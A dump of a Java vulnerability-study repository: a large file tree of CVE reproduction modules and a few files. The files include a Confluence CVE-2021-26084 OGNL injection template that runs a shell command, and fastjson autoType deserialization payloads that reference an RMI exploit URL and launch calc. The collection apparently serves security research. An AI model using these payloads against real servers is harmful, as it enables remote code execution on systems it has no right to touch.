├── .idea ├── .gitignore ├── JavaVulnSummary.iml ├── compiler.xml ├── dataSources.xml ├── encodings.xml ├── findbugs-idea.xml ├── inspectionProfiles │ └── Project_Default.xml ├── jarRepositories.xml ├── libraries │ ├── jar_files.xml │ └── weblogic.xml ├── misc.xml ├── sonarlint │ └── issuestore │ │ ├── 1 │ │ └── 4 │ │ │ └── 14edfe89162416d49c32552d017ca837f62b9422 │ │ ├── 2 │ │ └── c │ │ │ └── 2c4f2037ecb9d27c65e2c90c0ca498ad12b50c31 │ │ ├── 4 │ │ └── 4 │ │ │ └── 442292b8a7efeabbe4cc176709b833b1792140ec │ │ ├── 9 │ │ └── 9 │ │ │ └── 99cb82bff7b56e8ffefd753a558b27e14d2d2f65 │ │ ├── c │ │ └── 2 │ │ │ └── c20815daf9879f91f4163a71209c4dbb39aad053 │ │ └── index.pb ├── sqldialects.xml ├── uiDesigner.xml └── vcs.xml ├── JavaVulnSummary.iml ├── README.md ├── common ├── pom.xml └── src │ └── main │ └── java │ └── com │ └── r17a │ └── annotation │ └── Dependencies.java ├── confluence ├── pom.xml ├── src │ └── main │ │ ├── java │ │ └── com │ │ │ └── r17a │ │ │ └── confluence │ │ │ └── velocity │ │ │ └── VelocityTest.java │ │ └── resources │ │ └── velocity │ │ ├── CVE-2021-26084.vm │ │ └── velocity_test.vm └── target │ └── classes │ ├── com │ └── r17a │ │ └── confluence │ │ └── velocity │ │ └── VelocityTest.class │ └── velocity │ ├── CVE-2021-26084.vm │ └── velocity_test.vm ├── fastjson ├── pom.xml └── src │ ├── main │ └── java │ │ └── com │ │ └── r17a │ │ └── fastjson │ │ ├── Fastjson_1_2_24.java │ │ └── Fastjson_1_2_25.java │ └── test │ └── java │ └── test │ ├── FastjsonSetterTest.java │ └── FastjsonTest.java ├── jboss ├── pom.xml ├── src │ └── main │ │ └── java │ │ └── com │ │ └── jboss │ │ └── main │ │ ├── Payload.java │ │ ├── Test.java │ │ ├── doPost.java │ │ └── main.java └── target │ └── classes │ ├── META-INF │ └── jboss.kotlin_module │ └── com │ └── jboss │ └── main │ ├── Payload.class │ ├── Test.class │ ├── doPost.class │ ├── main$1.class │ ├── main$2.class │ ├── main$3.class │ └── main.class ├── jenkins ├── pom.xml └── src │ └── main │ └── java │ └── com │ └── r17a 
│ └── jenkins │ └── CVE_2021_21677.java ├── jndi ├── pom.xml ├── src │ └── main │ │ └── java │ │ └── com │ │ └── r17a │ │ └── jndi │ │ ├── JndiAndDns.java │ │ ├── JndiAndLdap.java │ │ ├── JndiAndRmi.java │ │ ├── ldap │ │ ├── CalcTest.java │ │ ├── LdapRefServer.java │ │ ├── LdapSerClient.java │ │ ├── LdapSerServer.java │ │ └── SerObject.java │ │ └── rmi │ │ ├── Calc.java │ │ ├── ICalc.java │ │ ├── RmiClient.java │ │ └── RmiRegisterServer.java └── target │ └── classes │ └── com │ └── r17a │ └── jndi │ ├── JndiAndDns.class │ ├── JndiAndLdap.class │ ├── JndiAndRmi.class │ ├── ldap │ ├── CalcTest.class │ ├── LdapRefServer$OperationInterceptor.class │ ├── LdapRefServer.class │ ├── LdapSerClient.class │ ├── LdapSerServer$OperationInterceptor.class │ ├── LdapSerServer.class │ └── SerObject.class │ └── rmi │ ├── Calc.class │ ├── ICalc.class │ ├── RmiClient.class │ └── RmiRegisterServer.class ├── log4j ├── pom.xml ├── src │ └── main │ │ ├── java │ │ └── com │ │ │ └── r17a │ │ │ └── log4j2 │ │ │ └── cve_2021_44228 │ │ │ ├── EXP.java │ │ │ └── RCE_20211209.java │ │ └── resources │ │ └── log4j.properties └── target │ └── classes │ ├── com │ └── r17a │ │ └── log4j2 │ │ ├── EXP.class │ │ └── RCE_20211209.class │ └── log4j.properties ├── owasp ├── pom.xml ├── src │ └── main │ │ ├── java │ │ └── com │ │ │ └── r17a │ │ │ └── commonvuln │ │ │ ├── cors │ │ │ └── Cors.java │ │ │ ├── file │ │ │ ├── FileDelete.java │ │ │ ├── FileUnzip.java │ │ │ └── FileUploadOrDownload.java │ │ │ ├── injection │ │ │ ├── command │ │ │ │ ├── ProcessCmdInject.java │ │ │ │ └── RuntimeCmdInject.java │ │ │ ├── expression │ │ │ │ ├── mvel │ │ │ │ │ └── MvelTest.java │ │ │ │ ├── ognl │ │ │ │ │ ├── OgnlTest.java │ │ │ │ │ └── bean │ │ │ │ │ │ ├── School.java │ │ │ │ │ │ ├── SchoolMaster.java │ │ │ │ │ │ └── Student.java │ │ │ │ └── spel │ │ │ │ │ └── SpelTest.java │ │ │ └── sqli │ │ │ │ ├── hibernate │ │ │ │ ├── HibernateSqli.java │ │ │ │ ├── pojo │ │ │ │ │ ├── User.hbm.xml │ │ │ │ │ └── User.java │ │ │ │ └── 
utils │ │ │ │ │ └── HibernateUtils.java │ │ │ │ ├── jdbc │ │ │ │ └── JdbcSqli.java │ │ │ │ └── mybatis │ │ │ │ ├── MybatisSqli.java │ │ │ │ ├── dao │ │ │ │ ├── UserMapper.java │ │ │ │ └── UserMapper.xml │ │ │ │ ├── pojo │ │ │ │ └── User.java │ │ │ │ └── utils │ │ │ │ └── MybatisUtils.java │ │ │ ├── securitymissconfig │ │ │ ├── securitymanager │ │ │ │ ├── BypassByClassloader.java │ │ │ │ ├── BypassByReflection.java │ │ │ │ ├── SetSecurityManagerNullBypass.java │ │ │ │ └── policy │ │ │ │ │ ├── CreatePolicy.java │ │ │ │ │ └── TestFilePolicy.java │ │ │ └── xxe │ │ │ │ ├── DocumentBuilderXXE.java │ │ │ │ ├── Payloads.java │ │ │ │ ├── SAXBuilderXXE.java │ │ │ │ ├── SAXParserFactoryXXE.java │ │ │ │ ├── SAXReadXXE.java │ │ │ │ ├── SAXTransformerFactoryXXE.java │ │ │ │ ├── TransformerFactoryXXE.java │ │ │ │ └── XXE.java │ │ │ └── ssrf │ │ │ └── Ssrf.java │ │ └── resources │ │ ├── hibernate.cfg.xml │ │ ├── imgs │ │ └── 111.png │ │ ├── mybatis-config.xml │ │ ├── tmp │ │ └── tmp │ │ └── user_db.sql └── target │ ├── classes │ ├── com │ │ └── r17a │ │ │ └── commonvuln │ │ │ ├── cors │ │ │ └── Cors.class │ │ │ ├── file │ │ │ ├── FileDelete.class │ │ │ ├── FileUnzip.class │ │ │ └── FileUploadOrDownload.class │ │ │ ├── injection │ │ │ ├── command │ │ │ │ ├── ProcessCmdInject.class │ │ │ │ └── RuntimeCmdInject.class │ │ │ ├── expression │ │ │ │ ├── mvel │ │ │ │ │ └── MvelTest.class │ │ │ │ ├── ognl │ │ │ │ │ ├── OgnlTest$1.class │ │ │ │ │ ├── OgnlTest.class │ │ │ │ │ └── bean │ │ │ │ │ │ ├── School.class │ │ │ │ │ │ ├── SchoolMaster.class │ │ │ │ │ │ └── Student.class │ │ │ │ └── spel │ │ │ │ │ └── SpelTest.class │ │ │ ├── redirect │ │ │ │ └── UrlRedirect.class │ │ │ └── sqli │ │ │ │ ├── hibernate │ │ │ │ ├── HibernateSqli.class │ │ │ │ ├── pojo │ │ │ │ │ ├── User.class │ │ │ │ │ └── User.hbm.xml │ │ │ │ └── utils │ │ │ │ │ └── HibernateUtils.class │ │ │ │ ├── jdbc │ │ │ │ └── JdbcSqli.class │ │ │ │ └── mybatis │ │ │ │ ├── MybatisSqli.class │ │ │ │ ├── dao │ │ │ │ ├── 
UserMapper.class │ │ │ │ └── UserMapper.xml │ │ │ │ ├── pojo │ │ │ │ └── User.class │ │ │ │ └── utils │ │ │ │ └── MybatisUtils.class │ │ │ ├── securitymissconfig │ │ │ ├── securitymanager │ │ │ │ ├── BypassByClassloader.class │ │ │ │ ├── BypassByReflection.class │ │ │ │ ├── Evil.class │ │ │ │ ├── MyClassLoader.class │ │ │ │ ├── SetSecurityManagerNullBypass.class │ │ │ │ └── policy │ │ │ │ │ ├── CreatePolicy.class │ │ │ │ │ ├── TestFilePolicy$1.class │ │ │ │ │ └── TestFilePolicy.class │ │ │ └── xxe │ │ │ │ ├── DocumentBuilderXXE.class │ │ │ │ ├── Payloads.class │ │ │ │ ├── SAXBuilderXXE.class │ │ │ │ ├── SAXHandel.class │ │ │ │ ├── SAXParserFactoryXXE.class │ │ │ │ ├── SAXReadXXE.class │ │ │ │ ├── SAXTransformerFactoryXXE.class │ │ │ │ ├── TransformerFactoryXXE.class │ │ │ │ └── XXE.class │ │ │ └── ssrf │ │ │ └── Ssrf.class │ ├── hibernate.cfg.xml │ └── mybatis-config.xml │ └── maven-status │ └── maven-compiler-plugin │ └── compile │ └── default-compile │ ├── createdFiles.lst │ └── inputFiles.lst ├── pom.xml ├── struts2 ├── pom.xml ├── src │ └── main │ │ ├── java │ │ └── com │ │ │ └── r17a │ │ │ └── action │ │ │ └── IndexAction.java │ │ ├── resources │ │ └── struts.xml │ │ └── webapp │ │ ├── WEB-INF │ │ └── web.xml │ │ └── index.jsp └── target │ ├── classes │ ├── com │ │ └── r17a │ │ │ └── action │ │ │ └── IndexAction.class │ └── struts.xml │ ├── struts2.war │ └── struts2 │ ├── META-INF │ └── MANIFEST.MF │ ├── WEB-INF │ ├── classes │ │ ├── com │ │ │ └── r17a │ │ │ │ └── action │ │ │ │ └── IndexAction.class │ │ └── struts.xml │ ├── lib │ │ ├── commons-collections-3.2.2.jar │ │ ├── commons-fileupload-1.4.jar │ │ ├── commons-io-2.6.jar │ │ ├── commons-lang3-3.8.1.jar │ │ ├── freemarker-2.3.30.jar │ │ ├── javassist-3.20.0-GA.jar │ │ ├── log4j-api-2.12.1.jar │ │ ├── ognl-3.1.28.jar │ │ └── struts2-core-2.5.25.jar │ └── web.xml │ └── index.jsp ├── weblogic ├── lib │ ├── jar_files │ │ ├── aopalliance-repackaged-2.6.1.jar │ │ ├── coherence-20.12.2.jar │ │ ├── 
coherence-management-20.12.2.jar │ │ ├── coherence-rest.jar │ │ ├── coherence-web.jar │ │ ├── eclipselink.jar │ │ ├── hk2-api-2.6.1.jar │ │ ├── hk2-locator-2.6.1.jar │ │ ├── hk2-utils-2.6.1.jar │ │ ├── jackson-annotations-2.12.0.jar │ │ ├── jackson-core-2.12.0.jar │ │ ├── jackson-databind-2.12.0.jar │ │ ├── jackson-jaxrs-base-2.12.0.jar │ │ ├── jackson-jaxrs-json-provider-2.12.0.jar │ │ ├── jackson-module-jaxb-annotations-2.12.0.jar │ │ ├── jakarta.activation-1.2.1.jar │ │ ├── jakarta.activation-api-1.2.1.jar │ │ ├── jakarta.annotation-api-1.3.5.jar │ │ ├── jakarta.inject-2.6.1.jar │ │ ├── jakarta.validation-api-2.0.2.jar │ │ ├── jakarta.ws.rs-api-2.1.6.jar │ │ ├── jakarta.xml.bind-api-2.3.2.jar │ │ ├── javassist-3.25.0-GA.jar │ │ ├── jersey-client-2.30.1.jar │ │ ├── jersey-common-2.30.1.jar │ │ ├── jersey-entity-filtering-2.30.1.jar │ │ ├── jersey-hk2-2.30.1.jar │ │ ├── jersey-media-jaxb-2.30.1.jar │ │ ├── jersey-media-json-jackson-2.30.1.jar │ │ ├── jersey-server-2.30.1.jar │ │ ├── osgi-resource-locator-1.0.3.jar │ │ └── toplink-grid.jar │ └── weblogic │ │ ├── coherence.jar │ │ ├── commons-cli-1.4.jar │ │ ├── commons-codec-1.15.jar │ │ ├── commons-collections-3.1.jar │ │ ├── commons-httpclient-3.1.jar │ │ ├── commons-io-2.7.jar │ │ ├── commons-logging-1.2.jar │ │ ├── jsafeFIPS.jar │ │ ├── wlcipher.jar │ │ └── wlfullclient.jar ├── pom.xml ├── src │ └── main │ │ └── java │ │ └── com │ │ ├── r17a │ │ └── weblogic │ │ │ ├── Main.java │ │ │ ├── cve │ │ │ ├── CVE_2020_14654.java │ │ │ ├── CVE_2020_14756.java │ │ │ ├── CVE_2020_14841.java │ │ │ ├── CVE_2020_2555.java │ │ │ ├── CVE_2020_2883_POC1.java │ │ │ ├── CVE_2020_2883_POC2.java │ │ │ ├── CVE_2021_2135.java │ │ │ ├── CVE_2021_2394.java │ │ │ └── ObjectPayload.java │ │ │ └── supeream │ │ │ ├── payload │ │ │ ├── PayloadTest.java │ │ │ └── RemoteImpl.java │ │ │ ├── serial │ │ │ ├── BytesOperation.java │ │ │ ├── Reflections.java │ │ │ ├── SerialDataGenerator.java │ │ │ └── Serializables.java │ │ │ ├── ssl │ │ │ ├── 
SocketFactory.java │ │ │ ├── TrustManagerImpl.java │ │ │ └── WeblogicTrustManager.java │ │ │ └── weblogic │ │ │ ├── BypassPayloadSelector.java │ │ │ ├── ObjectTest.java │ │ │ ├── T3ProtocolOperation.java │ │ │ ├── T3Test.java │ │ │ └── WebLogicOperation.java │ │ └── supeream │ │ ├── Main.java │ │ ├── payload │ │ ├── PayloadTest.java │ │ └── RemoteImpl.java │ │ ├── serial │ │ ├── BytesOperation.java │ │ ├── Reflections.java │ │ ├── SerialDataGenerator.java │ │ └── Serializables.java │ │ ├── ssl │ │ ├── SocketFactory.java │ │ ├── TrustManagerImpl.java │ │ └── WeblogicTrustManager.java │ │ └── weblogic │ │ ├── BypassPayloadSelector.java │ │ ├── ObjectTest.java │ │ ├── T3ProtocolOperation.java │ │ ├── T3Test.java │ │ └── WebLogicOperation.java └── target │ └── classes │ └── com │ ├── r17a │ └── weblogic │ │ ├── Main.class │ │ ├── cve │ │ ├── CVE_2020_14654.class │ │ ├── CVE_2020_14756.class │ │ ├── CVE_2020_14841.class │ │ ├── CVE_2020_2555.class │ │ ├── CVE_2020_2883_POC1.class │ │ ├── CVE_2020_2883_POC2.class │ │ ├── CVE_2021_2135.class │ │ ├── CVE_2021_2394.class │ │ └── ObjectPayload.class │ │ └── supeream │ │ ├── payload │ │ ├── PayloadTest.class │ │ └── RemoteImpl.class │ │ ├── serial │ │ ├── BytesOperation.class │ │ ├── Reflections.class │ │ ├── SerialDataGenerator.class │ │ └── Serializables.class │ │ ├── ssl │ │ ├── SocketFactory.class │ │ ├── TrustManagerImpl.class │ │ └── WeblogicTrustManager.class │ │ └── weblogic │ │ ├── BypassPayloadSelector.class │ │ ├── ObjectTest.class │ │ ├── T3ProtocolOperation.class │ │ ├── T3Test.class │ │ └── WebLogicOperation.class │ └── supeream │ ├── Main.class │ ├── payload │ ├── PayloadTest.class │ └── RemoteImpl.class │ ├── serial │ ├── BytesOperation.class │ ├── Reflections.class │ ├── SerialDataGenerator.class │ └── Serializables.class │ ├── ssl │ ├── SocketFactory.class │ ├── TrustManagerImpl.class │ └── WeblogicTrustManager.class │ └── weblogic │ ├── BypassPayloadSelector.class │ ├── ObjectTest.class │ ├── 
T3ProtocolOperation.class │ ├── T3Test.class │ └── WebLogicOperation.class ├── xstream ├── pom.xml ├── src │ └── main │ │ └── java │ │ └── com │ │ └── r17a │ │ └── xstream │ │ ├── cve │ │ ├── eventlistenerlist │ │ │ └── CVE_2021_39151.java │ │ ├── hashmap │ │ │ ├── CVE_2020_26217.java │ │ │ └── CVE_2021_39152.java │ │ ├── linkedhashset │ │ │ ├── CVE_2021_39139.java │ │ │ ├── CVE_2021_39140.java │ │ │ └── CVE_2021_39149.java │ │ ├── priorityqueue │ │ │ ├── CVE_2021_21344.java │ │ │ ├── CVE_2021_21345.java │ │ │ ├── CVE_2021_39141.java │ │ │ ├── CVE_2021_39144.java │ │ │ ├── CVE_2021_39145.java │ │ │ ├── CVE_2021_39150.java │ │ │ ├── CVE_2021_39153.java │ │ │ └── test.java │ │ └── sortedset │ │ │ ├── CVE_2019_10173.java │ │ │ ├── CVE_2021_39146.java │ │ │ ├── CVE_2021_39147.java │ │ │ ├── CVE_2021_39148.java │ │ │ └── CVE_2021_39154.java │ │ └── test │ │ ├── School.java │ │ ├── Student.java │ │ └── Test.java └── target │ └── classes │ └── com │ └── r17a │ └── xstream │ ├── cve │ ├── eventlistenerlist │ │ └── CVE_2021_39151.class │ ├── hashmap │ │ ├── CVE_2020_26217.class │ │ └── CVE_2021_39152.class │ ├── linkedhashset │ │ ├── CVE_2021_39139.class │ │ ├── CVE_2021_39140.class │ │ └── CVE_2021_39149.class │ ├── priorityqueue │ │ ├── CVE_2021_21344.class │ │ ├── CVE_2021_21345.class │ │ ├── CVE_2021_39141.class │ │ ├── CVE_2021_39144.class │ │ ├── CVE_2021_39145.class │ │ ├── CVE_2021_39150.class │ │ ├── CVE_2021_39153.class │ │ └── test.class │ └── sortedset │ │ ├── CVE_2019_10173.class │ │ ├── CVE_2021_39146.class │ │ ├── CVE_2021_39147.class │ │ ├── CVE_2021_39148.class │ │ └── CVE_2021_39154.class │ └── test │ ├── ImpTest.class │ ├── School.class │ ├── Student.class │ ├── Test$1.class │ ├── Test.class │ └── TestInterface.class └── ysoserial ├── pom.xml └── src └── main └── java └── com └── r17a └── ysoserial ├── BeanShell1.java ├── CommonsBeanutils1.java ├── CommonsCollections2.java ├── CommonsCollections4.java ├── Jython1.java └── jdk7u21 ├── HashBruteTest.java 
├── Poc.java └── TestTmp.java /.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # Default ignored files 2 | /shelf/ 3 | /workspace.xml 4 | # Datasource local storage ignored files 5 | /dataSources/ 6 | /dataSources.local.xml 7 | # Editor-based HTTP Client requests 8 | /httpRequests/ 9 | -------------------------------------------------------------------------------- /.idea/JavaVulnSummary.iml: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /.idea/compiler.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /.idea/dataSources.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | mysql.8 6 | true 7 | com.mysql.cj.jdbc.Driver 8 | jdbc:mysql://localhost:3306/users 9 | 10 | 11 | -------------------------------------------------------------------------------- /.idea/encodings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /.idea/findbugs-idea.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /.idea/inspectionProfiles/Project_Default.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 36 | -------------------------------------------------------------------------------- /.idea/jarRepositories.xml: 
-------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 9 | 10 | 14 | 15 | 19 | 20 | -------------------------------------------------------------------------------- /.idea/libraries/jar_files.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /.idea/libraries/weblogic.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 10 | 11 | 16 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /.idea/sonarlint/issuestore/1/4/14edfe89162416d49c32552d017ca837f62b9422: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/.idea/sonarlint/issuestore/1/4/14edfe89162416d49c32552d017ca837f62b9422 -------------------------------------------------------------------------------- /.idea/sonarlint/issuestore/2/c/2c4f2037ecb9d27c65e2c90c0ca498ad12b50c31: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/.idea/sonarlint/issuestore/2/c/2c4f2037ecb9d27c65e2c90c0ca498ad12b50c31 -------------------------------------------------------------------------------- /.idea/sonarlint/issuestore/4/4/442292b8a7efeabbe4cc176709b833b1792140ec: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/.idea/sonarlint/issuestore/4/4/442292b8a7efeabbe4cc176709b833b1792140ec -------------------------------------------------------------------------------- /.idea/sonarlint/issuestore/9/9/99cb82bff7b56e8ffefd753a558b27e14d2d2f65: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/.idea/sonarlint/issuestore/9/9/99cb82bff7b56e8ffefd753a558b27e14d2d2f65 -------------------------------------------------------------------------------- /.idea/sonarlint/issuestore/c/2/c20815daf9879f91f4163a71209c4dbb39aad053: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/.idea/sonarlint/issuestore/c/2/c20815daf9879f91f4163a71209c4dbb39aad053 -------------------------------------------------------------------------------- /.idea/sonarlint/issuestore/index.pb: -------------------------------------------------------------------------------- 1 | 2 |  3 | Oowasp/src/main/java/com/r17a/commonvuln/injection/command/ProcessCmdInject.java,1\4\14edfe89162416d49c32552d017ca837f62b9422 4 | = 5 | owasp/pom.xml,2\c\2c4f2037ecb9d27c65e2c90c0ca498ad12b50c31 6 | 7 7 | pom.xml,4\4\442292b8a7efeabbe4cc176709b833b1792140ec 8 | g 9 | 7weblogic/src/main/java/com/r17a/cve/CVE_2020_14654.java,9\9\99cb82bff7b56e8ffefd753a558b27e14d2d2f65 10 |  11 | Oowasp/src/main/java/com/r17a/commonvuln/injection/command/RuntimeCmdInject.java,c\2\c20815daf9879f91f4163a71209c4dbb39aad053 -------------------------------------------------------------------------------- /.idea/sqldialects.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- 
/.idea/vcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /JavaVulnSummary.iml: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /common/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | JavaVulnSummary 7 | com.r17a 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | common 13 | 14 | 15 |
--------------------------------------------------------------------------------
/common/src/main/java/com/r17a/annotation/Dependencies.java:
--------------------------------------------------------------------------------
 1 | package com.r17a.annotation;
 2 |
 3 | import java.lang.annotation.ElementType;
 4 | import java.lang.annotation.Retention;
 5 | import java.lang.annotation.RetentionPolicy;
 6 | import java.lang.annotation.Target;
 7 | import java.lang.reflect.AnnotatedElement;
 8 | // Type-level, runtime-retained annotation that lists dependency strings for a class, plus static helpers to read them.
 9 | @Target(ElementType.TYPE)
10 | @Retention(RetentionPolicy.RUNTIME)
11 | public @interface Dependencies {
12 |     String[] value() default {}; // the declared dependency strings; empty when none are given
13 |
14 |     public static class Utils {
15 |         public static String[] getDependencies(AnnotatedElement annotated) { // returns the element's @Dependencies value, or an empty array when it carries no such annotation
16 |             Dependencies deps = annotated.getAnnotation(Dependencies.class);
17 |             if (deps != null && deps.value() != null) {
18 |                 return deps.value();
19 |             } else {
20 |                 return new String[0];
21 |             }
22 |         }
23 |
24 |         public static String[] getDependenciesSimple(AnnotatedElement annotated) { // returns, for every entry, the text after its first ':'
25 |             String[] deps = getDependencies(annotated);
26 |             String[] simple = new String[deps.length];
27 |             for (int i = 0; i < simple.length; i++) {
28 |                 simple[i] = deps[i].split(":", 2)[1]; // NOTE(review): an entry without ':' yields a one-element array, so [1] throws ArrayIndexOutOfBoundsException
29 |             }
30 |             return simple;
31 |         }
32 |     }
33 | }
34 |
--------------------------------------------------------------------------------
/confluence/pom.xml:
-------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | JavaVulnSummary 7 | com.r17a 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | confluence 13 | 14 | 15 | 16 | org.apache.velocity 17 | velocity 18 | 1.7 19 | 20 | 21 | 22 |
--------------------------------------------------------------------------------
/confluence/src/main/java/com/r17a/confluence/velocity/VelocityTest.java:
--------------------------------------------------------------------------------
 1 | package com.r17a.confluence.velocity;
 2 |
 3 | import org.apache.velocity.Template;
 4 | import org.apache.velocity.VelocityContext;
 5 | import org.apache.velocity.app.VelocityEngine;
 6 | import java.io.StringWriter;
 7 |
 8 | // Renders the classpath template velocity/velocity_test.vm with two context values and prints the merged output.
 9 | public class VelocityTest {
10 |     public static void main(String[] args) {
11 |         VelocityEngine velocityEngine = new VelocityEngine();
12 |         // Load templates from the classpath (the resources directory)
13 |         velocityEngine.setProperty("file.resource.loader.class", "org.apache.velocity.runtime.resource.loader.ClasspathResourceLoader");
14 |
15 |         VelocityContext context = new VelocityContext();
16 |         context.put("value1", "\u0027"); // the escape is the code point of a single quote, so value1 is the one-character string '
17 |         context.put("value2", null); // null value; velocity_test.vm references it as $!value2
18 |
19 |         // Fetch the template file, pass the context data to it and render
20 |         Template template = velocityEngine.getTemplate("velocity/velocity_test.vm"); // NOTE(review): only velocity_test.vm is loaded; CVE-2021-26084.vm in the same directory is not referenced by this class
21 |         StringWriter stringWriter = new StringWriter();
22 |         template.merge(context, stringWriter);
23 |         System.out.println(stringWriter);
24 |     }
25 | }
--------------------------------------------------------------------------------
/confluence/src/main/resources/velocity/CVE-2021-26084.vm:
--------------------------------------------------------------------------------
1 | #tag ("Hidden" "name='queryString'" "value='aaa\u0027%2b#{\u0022\u0022[\u0022class\u0022].forName(\u0022java.lang.Runtime\u0022).getMethod(\u0022getRuntime\u0022,null).invoke(null,null).exec(\u0022touch /tmp/success\u0022)}%2b\u0027'")
--------------------------------------------------------------------------------
/confluence/src/main/resources/velocity/velocity_test.vm: -------------------------------------------------------------------------------- 1 | velocity test: 2 | #set ($value="aaaaa") 3 | value is '$value' 4 | value1 is "$value1" 5 | value2 is "$!value2" 6 | -------------------------------------------------------------------------------- /confluence/target/classes/com/r17a/confluence/velocity/VelocityTest.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/confluence/target/classes/com/r17a/confluence/velocity/VelocityTest.class -------------------------------------------------------------------------------- /confluence/target/classes/velocity/CVE-2021-26084.vm: -------------------------------------------------------------------------------- 1 | #tag ("Hidden" "name='queryString'" "value='aaa\u0027%2b#{\u0022\u0022[\u0022class\u0022].forName(\u0022java.lang.Runtime\u0022).getMethod(\u0022getRuntime\u0022,null).invoke(null,null).exec(\u0022touch /tmp/success\u0022)}%2b\u0027'") -------------------------------------------------------------------------------- /confluence/target/classes/velocity/velocity_test.vm: -------------------------------------------------------------------------------- 1 | velocity test: 2 | #set ($value="aaaaa") 3 | value is '$value' 4 | value1 is "$value1" 5 | value2 is "$!value2" -------------------------------------------------------------------------------- /fastjson/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | JavaVulnSummary 7 | com.r17a 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | fastjson 13 | 14 | 15 | com.r17a 16 | common 17 | 1.0-SNAPSHOT 18 | compile 19 | 20 | 21 | 22 | com.alibaba 23 | fastjson 24 | 1.2.24 25 | 26 | 27 | javassist 28 | javassist 29 | 3.12.1.GA 30 | compile 31 | 32 | 33 | 34 | 35 | 
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/r17a/fastjson/Fastjson_1_2_25.java:
--------------------------------------------------------------------------------
 1 | package com.r17a.fastjson;
 2 |
 3 | import com.r17a.annotation.Dependencies;
 4 | import com.alibaba.fastjson.JSON;
 5 |
 6 | import java.io.IOException;
 7 | // NOTE(review): the group id below reads "com.alibaba." with a trailing dot, and fastjson/pom.xml declares fastjson 1.2.24, not 1.2.25 (see the TODO).
 8 | @Dependencies({ "com.alibaba.:fastjson:1.2.25" })
 9 | //TODO change the dependency version in pom.xml
10 | //
11 | // com.alibaba
12 | // fastjson
13 | // 1.2.25
14 | //
15 | // Parses a fixed JSON string whose "@type" field names the class to instantiate, then prints the parsed object.
16 | public class Fastjson_1_2_25 {
17 |     public static void main(String[] args) {
18 |         // Deserialize a fastjson.test.T1 object
19 |         // Version 1.2.25 and later added the checkAutoType() check,
20 |         String text = "{\"@type\":\"Lcom.sun.rowset.JdbcRowSetImpl;\", \"dataSourceName\":\"rmi://localhost:1099/Exploit\", \"autoCommit\":true}"; // the class name is wrapped in "L" ... ";" and dataSourceName points at an RMI URL on localhost
21 |         Object object = JSON.parseObject(text); // NOTE(review): no expected class is passed, so the type comes from the input; whether checkAutoType() accepts it depends on the fastjson version and its autoType settings, none of which this file configures. Code that parses untrusted JSON should run a current fastjson with autoType left disabled and pass an explicit target class.
22 |         System.out.println(object);
23 |     }
24 | }
25 | // T2: its constructor starts "calc"; nothing in this file references the class.
26 | class T2 {
27 |     public T2() throws IOException {
28 |         Runtime.getRuntime().exec("calc");
29 |     }
30 | }
--------------------------------------------------------------------------------
/fastjson/src/test/java/test/FastjsonSetterTest.java:
--------------------------------------------------------------------------------
 1 | package test;
 2 |
 3 | import com.alibaba.fastjson.JSON;
 4 | import com.alibaba.fastjson.JSONObject;
 5 |
 6 | import java.io.IOException;
 7 | // Parses a JSON string that names test.Test in "@type" and prints the resulting JSONObject.
 8 | public class FastjsonSetterTest {
 9 |     public static void main(String[] args) {
10 |         // Test calc = new Test("calc");
11 |         // String s = JSON.toJSONString(calc);
12 |         // System.out.println(s);
13 |         // Test jsonObject = JSON.parseObject(s, Test.class);
14 |         // System.out.println(jsonObject.toString());
15 |         String s1 = "{\"@type\":\"test.Test\",\"cmd\":\"calc\"}";
16 |         JSONObject jsonObject1 = JSON.parseObject(s1); // NOTE(review): presumably fastjson instantiates test.Test and calls setCmd while parsing - confirm against the fastjson version on the classpath
